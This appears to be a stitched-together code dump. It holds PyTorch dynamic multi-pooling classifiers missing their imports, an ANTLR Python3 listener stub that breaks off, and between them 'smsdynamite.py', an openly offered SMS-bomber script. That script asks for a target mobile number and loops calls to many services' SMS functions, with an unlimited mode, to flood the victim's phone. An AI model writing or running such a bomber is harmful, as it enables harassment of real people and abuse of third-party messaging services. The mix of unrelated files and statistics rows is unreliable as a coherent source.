from transformers import BertPreTrainedModel, BertModel, AlbertPreTrainedModel, AlbertModel, DebertaModel, DebertaPreTrainedModel, DebertaV2Model, DebertaV2PreTrainedModel, XLNetModel, XLNetPreTrainedModel


class DMBERT(BertPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.bert = BertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.maxpooling = nn.MaxPool1d(128)
        self.classifier = nn.Linear(config.hidden_size * 2, config.num_labels)

    def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
        batchSize = input_ids.size(0)
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
        )
        conved = outputs[0]
        conved = conved.transpose(1, 2)
        conved = conved.transpose(0, 1)
        L = (conved * maskL).transpose(0, 1)
        R = (conved * maskR).transpose(0, 1)
        L = L + torch.ones_like(L)
        R = R + torch.ones_like(R)
        pooledL = self.maxpooling(L).contiguous().view(batchSize, self.config.hidden_size)
        pooledR = self.maxpooling(R).contiguous().view(batchSize, self.config.hidden_size)
        pooled = torch.cat((pooledL, pooledR), 1)
        pooled = pooled - torch.ones_like(pooled)
        pooled = self.dropout(pooled)
        logits = self.classifier(pooled)
        reshaped_logits = logits.view(-1, self.config.num_labels)
        outputs = (reshaped_logits,) + outputs[2:]
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
            outputs = (loss,) + outputs
        return outputs
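# The forward above implements dynamic multi-pooling: max-pool the hidden states
# on each side of the trigger token (maskL/maskR select the regions; the +1/-1
# with torch.ones_like keeps the masked-out zeros from winning the max) and
# concatenate the two pooled halves. A torch-free, list-based sketch of that
# pooling idea follows; the function name and the exact mask boundaries are
# illustrative assumptions, and both regions are assumed non-empty:

```python
def dynamic_multi_pool(hidden, trigger_idx):
    """hidden: list of per-token feature vectors (lists of floats).
    Returns max over tokens up to the trigger concatenated with max over
    tokens after it, mirroring the maskL/maskR split in forward()."""
    dim = len(hidden[0])
    left = hidden[:trigger_idx + 1]    # maskL region (assumed non-empty)
    right = hidden[trigger_idx + 1:]   # maskR region (assumed non-empty)

    def pool(region):
        # element-wise max over the tokens of one region
        return [max(vec[d] for vec in region) for d in range(dim)]

    return pool(left) + pool(right)
```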

class DMALBERT(AlbertPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.albert = AlbertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.maxpooling = nn.MaxPool1d(128)
        self.classifier = nn.Linear(config.hidden_size * 2, config.num_labels)

    def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
        batchSize = input_ids.size(0)
        outputs = self.albert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
        )
        conved = outputs[0]
        conved = conved.transpose(1, 2)
        conved = conved.transpose(0, 1)
        L = (conved * maskL).transpose(0, 1)
        R = (conved * maskR).transpose(0, 1)
        L = L + torch.ones_like(L)
        R = R + torch.ones_like(R)
        pooledL = self.maxpooling(L).contiguous().view(batchSize, self.config.hidden_size)
        pooledR = self.maxpooling(R).contiguous().view(batchSize, self.config.hidden_size)
        pooled = torch.cat((pooledL, pooledR), 1)
        pooled = pooled - torch.ones_like(pooled)
        pooled = self.dropout(pooled)
        logits = self.classifier(pooled)
        reshaped_logits = logits.view(-1, self.config.num_labels)
        outputs = (reshaped_logits,) + outputs[2:]
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
            outputs = (loss,) + outputs
        return outputs

class DMDEBERTA(DebertaPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.deberta = DebertaModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.maxpooling = nn.MaxPool1d(128)
        self.classifier = nn.Linear(config.hidden_size * 2, config.num_labels)

    def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
        batchSize = input_ids.size(0)
        outputs = self.deberta(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            inputs_embeds=inputs_embeds,
        )
        conved = outputs[0]
        conved = conved.transpose(1, 2)
        conved = conved.transpose(0, 1)
        L = (conved * maskL).transpose(0, 1)
        R = (conved * maskR).transpose(0, 1)
        L = L + torch.ones_like(L)
        R = R + torch.ones_like(R)
        pooledL = self.maxpooling(L).contiguous().view(batchSize, self.config.hidden_size)
        pooledR = self.maxpooling(R).contiguous().view(batchSize, self.config.hidden_size)
        pooled = torch.cat((pooledL, pooledR), 1)
        pooled = pooled - torch.ones_like(pooled)
        pooled = self.dropout(pooled)
        logits = self.classifier(pooled)
        reshaped_logits = logits.view(-1, self.config.num_labels)
        outputs = (reshaped_logits,) + outputs[2:]
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
            outputs = (loss,) + outputs
        return outputs

class DMDEBERTAV2(DebertaV2PreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.deberta = DebertaV2Model(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.maxpooling = nn.MaxPool1d(128)
        self.classifier = nn.Linear(config.hidden_size * 2, config.num_labels)

    def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
        batchSize = input_ids.size(0)
        outputs = self.deberta(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            inputs_embeds=inputs_embeds,
        )
        conved = outputs[0]
        conved = conved.transpose(1, 2)
        conved = conved.transpose(0, 1)
        L = (conved * maskL).transpose(0, 1)
        R = (conved * maskR).transpose(0, 1)
        L = L + torch.ones_like(L)
        R = R + torch.ones_like(R)
        pooledL = self.maxpooling(L).contiguous().view(batchSize, self.config.hidden_size)
        pooledR = self.maxpooling(R).contiguous().view(batchSize, self.config.hidden_size)
        pooled = torch.cat((pooledL, pooledR), 1)
        pooled = pooled - torch.ones_like(pooled)
        pooled = self.dropout(pooled)
        logits = self.classifier(pooled)
        reshaped_logits = logits.view(-1, self.config.num_labels)
        outputs = (reshaped_logits,) + outputs[2:]
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
            outputs = (loss,) + outputs
        return outputs

class DMXLNET(XLNetPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.xlnet = XLNetModel(config)
        self.dropout = nn.Dropout(config.dropout)
        self.maxpooling = nn.MaxPool1d(128)
        self.classifier = nn.Linear(config.hidden_size * 2, config.num_labels)

    def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
        batchSize = input_ids.size(0)
        outputs = self.xlnet(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
        )
        conved = outputs[0]
        conved = conved.transpose(1, 2)
        conved = conved.transpose(0, 1)
        L = (conved * maskL).transpose(0, 1)
        R = (conved * maskR).transpose(0, 1)
        L = L + torch.ones_like(L)
        R = R + torch.ones_like(R)
        pooledL = self.maxpooling(L).contiguous().view(batchSize, self.config.hidden_size)
        pooledR = self.maxpooling(R).contiguous().view(batchSize, self.config.hidden_size)
        pooled = torch.cat((pooledL, pooledR), 1)
        pooled = pooled - torch.ones_like(pooled)
        pooled = self.dropout(pooled)
        logits = self.classifier(pooled)
        reshaped_logits = logits.view(-1, self.config.num_labels)
        outputs = (reshaped_logits,) + outputs[2:]
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
            outputs = (loss,) + outputs
        return outputs
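# The five DM* classes above differ only in which backbone they instantiate (and
# minor details such as the dropout attribute); the pooling head is copied
# verbatim. One way to remove that duplication is a small class factory. A
# stdlib-only sketch of the pattern follows; the Dummy* classes stand in for
# e.g. BertModel/BertPreTrainedModel, and this is not how the repo is actually
# organized:

```python
def make_dm_model(name, backbone_cls, pretrained_base):
    """Build a DM* class that wires a backbone into a shared head skeleton."""
    def __init__(self, config):
        pretrained_base.__init__(self, config)
        self.backbone = backbone_cls(config)
        # the shared dropout/maxpool/classifier head would be built here
    return type(name, (pretrained_base,), {'__init__': __init__})


class DummyBase:            # stands in for e.g. BertPreTrainedModel
    def __init__(self, config):
        self.config = config


class DummyBackbone:        # stands in for e.g. BertModel
    def __init__(self, config):
        self.config = config
```

# Usage: DMDummy = make_dm_model('DMDummy', DummyBackbone, DummyBase) yields a
# class whose instances carry both the config and a backbone instance.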
# ---- smsdynamite.py (repo: MRTech-Ev/SmS-Dynamite, license: Apache-2.0) ----
import os,random,sys,time
from urllib import request
from api import *
import codecs
cle = 'clear' if os.name == 'posix' else 'cls'
from colorama import Fore,init,Style
init(autoreset=True)
os.system(cle)
fore=['\x1b[91m','\x1b[34m','\x1b[36m','\x1b[93m','\x1b[32m','\x1b[35m','\x1b[31m','\x1b[94m','\x1b[96m','\x1b[92m','\x1b[33m','\x1b[95m']
logo=("""
+----------------------------------------------------------------------+
| |
| ______________________________ . \ | / . |
| / / \ \ \ / / |
| | By MRTech |{========= >- -< |
| \____________________________\_/ / / \ \ |
| . / | \ . |
| |
+----------------------------------------------------------------------+
""")
bar='**_____________________________________**'
print(bar+'\n')
print(logo)
print(bar+'\n')
time.sleep(0.3)
print ("""
1) SMS Bomber
2) Coming Soon
3) Coming Soon
4) About
5) Exit""")
def prsent(count,num):
sys.stdout.write('\r' +random.choice(fore) +Style.BRIGHT+'\t[*]'+' Bombing '+str(num)+'\t'+str(count)+' Sent')
sys.stdout.flush()
def Spinner():
l=['|','/','-','\\']
for i in l+l+l:
sys.stdout.write('\r'+Style.BRIGHT+Fore.LIGHTYELLOW_EX+'[*]Checking Network... Please Wait '+i)
sys.stdout.flush()
time.sleep(0.2)
time.sleep(0.3)
while True:
try:
cho=int(input(Fore.LIGHTCYAN_EX+Style.BRIGHT+'Enter Your Choice: '))
if cho > 0 and cho <6:
break
else:
Print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Please Enter A Correct Choice!')
except:
print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Your Choice is Incorrect')
if cho==1:
time.sleep(0.4)
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
try:
Spinner()
request.urlopen('https://httpbin.org/get')
print(Fore.LIGHTGREEN_EX+Style.BRIGHT+'\n[+] Well Done Successfully Connected!')
time.sleep(1.5)
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
except:
time.sleep(0.4)
print(Fore.LIGHTRED_EX+Style.BRIGHT+'\n[!] Fail to Connect. Please Try Again!')
time.sleep(0.3)
print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Turn On Your Network...')
time.sleep(0.3)
input(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Exit...\n Press Enter to Return...')
exit()
while True:
try:
num=int(input(Style.BRIGHT+'Type Your Target Mobile Number (07xxxxxxxx): '))
num='0'+str(num)
if len(num) == 10 and str(num)[0:3] in ('070','071','072','075','076','077','078'):
break
else:
print(Fore.LIGHTRED_EX + 'Mobile Number is Incorrect!')
continue
except ValueError:
print(Fore.LIGHTRED_EX + 'Mobile Number is Incorrect!')
continue
time.sleep(0.4)
while True:
times=input(Style.BRIGHT+Fore.LIGHTYELLOW_EX+'How Many Messages You Want Sent ? Unlimited = (U):')
if times.isnumeric() or times == 'U' or times == 'u':
break
else:
print(Style.BRIGHT+Fore.LIGHTRED_EX+'[!] Type Correct Amount or \'U\' Unlimited')
time.sleep(0.4)
while True:
delay=input(Style.BRIGHT+Fore.LIGHTMAGENTA_EX+'Delay Time in (Seconds)\n\t\t[Recomended 5]:')
if delay.isnumeric() and int(delay) > 0:
delay=float(delay)
break
elif delay=='0':
print(Style.BRIGHT+Fore.LIGHTRED_EX+'[!] Type 0+ Value')
else:
delay=5.0
break
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
time.sleep(0.5)
print('\t{Style.BRIGHT}දැන් සැපද කෙලිය නේද ඌටත්...\n\t Help : https://t.me/MRTechGg \n\t Based on SL Bomber[https://github.com/Sl-Sanda-Ru/Sl-Bomber.git]' )
print(bar+'\n')
print(Fore.YELLOW+Style.BRIGHT+'\tYou Want Stop Press Ctrl+c')
if num[0:3] == '077' or num[0:3] == '076':
count=0
if times.isnumeric():
while count< int(times):
mega(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
mega(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '071' or num[0:3] == '070':
count=0
if times.isnumeric():
while count< int(times):
dtamart(num,delay)
count+=1
prsent(count,num)
if count<int(times):
dtamart2(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count< int(times):
mobself(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
dtamart(num,delay)
count+=1
prsent(count,num)
dtamart2(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
mobself(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '078' or num[0:3] == '072':
count=0
if times.isnumeric():
while count< int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutself(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
hutcliq(num,delay)
count+=1
prsent(count,num)
hutself(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '075':
count=0
if times.isnumeric():
while count< int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
print('\n'+bar+'\n')
time.sleep(0.90)
print(f'{Style.BRIGHT}{Fore.LIGHTGREEN_EX}\t[+] Hehe Wow, the Dynamite blew up on their phone!')
time.sleep(0.75)
ag=input(f'\t{Style.BRIGHT}{random.choice(fore)}[?] Anyone else you want to target?(y/n) ')
if ag == 'Y' or ag == 'y':
os.system('python3 smsdynamite.py')
else:
exit()
elif cho == 2:
os.system('python3 smsdynamite.py')
elif cho == 3:
os.system('python3 smsdynamite.py')
elif cho == 4:
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
print("""
Developed By MRTech
Evilz Team
__________
BLACKHAT SriLanka
""")
agd=input(f'\t{Style.BRIGHT}{random.choice(fore)}[?] Go Main Menu (y/n): ')
if agd == 'Y' or agd == 'y':
os.system('python3 smsdynamite.py')
else:
exit() | 27.201693 | 158 | 0.474645 | 2,276 | 19,286 | 3.976274 | 0.102373 | 0.190829 | 0.242873 | 0.285525 | 0.815249 | 0.802873 | 0.783204 | 0.760663 | 0.738232 | 0.712376 | 0 | 0.026247 | 0.387587 | 19,286 | 709 | 159 | 27.201693 | 0.738549 | 0 | 0 | 0.895184 | 0 | 0.005666 | 0.11147 | 0.021099 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.007082 | 0 | 0.009915 | 0.042493 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
# Source: pymacer-vscode/AntlrGrammar/Python3WalkListener.py (purushottamkar/pymacer, MIT)
from antlr4 import *
from AntlrGrammar.Python3Listener import Python3Listener
from AntlrGrammar.Python3Parser import Python3Parser
class Python3WalkListener(Python3Listener):
# Enter a parse tree produced by Python3Parser#single_input.
def enterSingle_input(self, ctx: Python3Parser.Single_inputContext):
pass
# Exit a parse tree produced by Python3Parser#single_input.
def exitSingle_input(self, ctx: Python3Parser.Single_inputContext):
pass
# Enter a parse tree produced by Python3Parser#file_input.
def enterFile_input(self, ctx: Python3Parser.File_inputContext):
pass
# Exit a parse tree produced by Python3Parser#file_input.
def exitFile_input(self, ctx: Python3Parser.File_inputContext):
pass
# Enter a parse tree produced by Python3Parser#eval_input.
def enterEval_input(self, ctx: Python3Parser.Eval_inputContext):
pass
# Exit a parse tree produced by Python3Parser#eval_input.
def exitEval_input(self, ctx: Python3Parser.Eval_inputContext):
pass
# Enter a parse tree produced by Python3Parser#decorator.
def enterDecorator(self, ctx: Python3Parser.DecoratorContext):
pass
# Exit a parse tree produced by Python3Parser#decorator.
def exitDecorator(self, ctx: Python3Parser.DecoratorContext):
pass
# Enter a parse tree produced by Python3Parser#decorators.
def enterDecorators(self, ctx: Python3Parser.DecoratorsContext):
pass
# Exit a parse tree produced by Python3Parser#decorators.
def exitDecorators(self, ctx: Python3Parser.DecoratorsContext):
pass
# Enter a parse tree produced by Python3Parser#decorated.
def enterDecorated(self, ctx: Python3Parser.DecoratedContext):
pass
# Exit a parse tree produced by Python3Parser#decorated.
def exitDecorated(self, ctx: Python3Parser.DecoratedContext):
pass
# Enter a parse tree produced by Python3Parser#async_funcdef.
def enterAsync_funcdef(self, ctx: Python3Parser.Async_funcdefContext):
pass
# Exit a parse tree produced by Python3Parser#async_funcdef.
def exitAsync_funcdef(self, ctx: Python3Parser.Async_funcdefContext):
pass
# Enter a parse tree produced by Python3Parser#funcdef.
def enterFuncdef(self, ctx: Python3Parser.FuncdefContext):
pass
# Exit a parse tree produced by Python3Parser#funcdef.
def exitFuncdef(self, ctx: Python3Parser.FuncdefContext):
pass
# Enter a parse tree produced by Python3Parser#parameters.
def enterParameters(self, ctx: Python3Parser.ParametersContext):
pass
# Exit a parse tree produced by Python3Parser#parameters.
def exitParameters(self, ctx: Python3Parser.ParametersContext):
pass
# Enter a parse tree produced by Python3Parser#typedargslist.
def enterTypedargslist(self, ctx: Python3Parser.TypedargslistContext):
pass
# Exit a parse tree produced by Python3Parser#typedargslist.
def exitTypedargslist(self, ctx: Python3Parser.TypedargslistContext):
pass
# Enter a parse tree produced by Python3Parser#tfpdef.
def enterTfpdef(self, ctx: Python3Parser.TfpdefContext):
pass
# Exit a parse tree produced by Python3Parser#tfpdef.
def exitTfpdef(self, ctx: Python3Parser.TfpdefContext):
pass
# Enter a parse tree produced by Python3Parser#varargslist.
def enterVarargslist(self, ctx: Python3Parser.VarargslistContext):
pass
# Exit a parse tree produced by Python3Parser#varargslist.
def exitVarargslist(self, ctx: Python3Parser.VarargslistContext):
pass
# Enter a parse tree produced by Python3Parser#vfpdef.
def enterVfpdef(self, ctx: Python3Parser.VfpdefContext):
pass
# Exit a parse tree produced by Python3Parser#vfpdef.
def exitVfpdef(self, ctx: Python3Parser.VfpdefContext):
pass
# Enter a parse tree produced by Python3Parser#stmt.
def enterStmt(self, ctx: Python3Parser.StmtContext):
pass
# Exit a parse tree produced by Python3Parser#stmt.
def exitStmt(self, ctx: Python3Parser.StmtContext):
pass
# Enter a parse tree produced by Python3Parser#simple_stmt.
def enterSimple_stmt(self, ctx: Python3Parser.Simple_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#simple_stmt.
def exitSimple_stmt(self, ctx: Python3Parser.Simple_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#small_stmt.
def enterSmall_stmt(self, ctx: Python3Parser.Small_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#small_stmt.
def exitSmall_stmt(self, ctx: Python3Parser.Small_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#expr_stmt.
def enterExpr_stmt(self, ctx: Python3Parser.Expr_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#expr_stmt.
def exitExpr_stmt(self, ctx: Python3Parser.Expr_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#annassign.
def enterAnnassign(self, ctx: Python3Parser.AnnassignContext):
pass
# Exit a parse tree produced by Python3Parser#annassign.
def exitAnnassign(self, ctx: Python3Parser.AnnassignContext):
pass
# Enter a parse tree produced by Python3Parser#testlist_star_expr.
def enterTestlist_star_expr(self, ctx: Python3Parser.Testlist_star_exprContext):
pass
# Exit a parse tree produced by Python3Parser#testlist_star_expr.
def exitTestlist_star_expr(self, ctx: Python3Parser.Testlist_star_exprContext):
pass
# Enter a parse tree produced by Python3Parser#augassign.
def enterAugassign(self, ctx: Python3Parser.AugassignContext):
pass
# Exit a parse tree produced by Python3Parser#augassign.
def exitAugassign(self, ctx: Python3Parser.AugassignContext):
pass
# Enter a parse tree produced by Python3Parser#del_stmt.
def enterDel_stmt(self, ctx: Python3Parser.Del_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#del_stmt.
def exitDel_stmt(self, ctx: Python3Parser.Del_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#pass_stmt.
def enterPass_stmt(self, ctx: Python3Parser.Pass_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#pass_stmt.
def exitPass_stmt(self, ctx: Python3Parser.Pass_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#flow_stmt.
def enterFlow_stmt(self, ctx: Python3Parser.Flow_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#flow_stmt.
def exitFlow_stmt(self, ctx: Python3Parser.Flow_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#break_stmt.
def enterBreak_stmt(self, ctx: Python3Parser.Break_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#break_stmt.
def exitBreak_stmt(self, ctx: Python3Parser.Break_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#continue_stmt.
def enterContinue_stmt(self, ctx: Python3Parser.Continue_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#continue_stmt.
def exitContinue_stmt(self, ctx: Python3Parser.Continue_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#return_stmt.
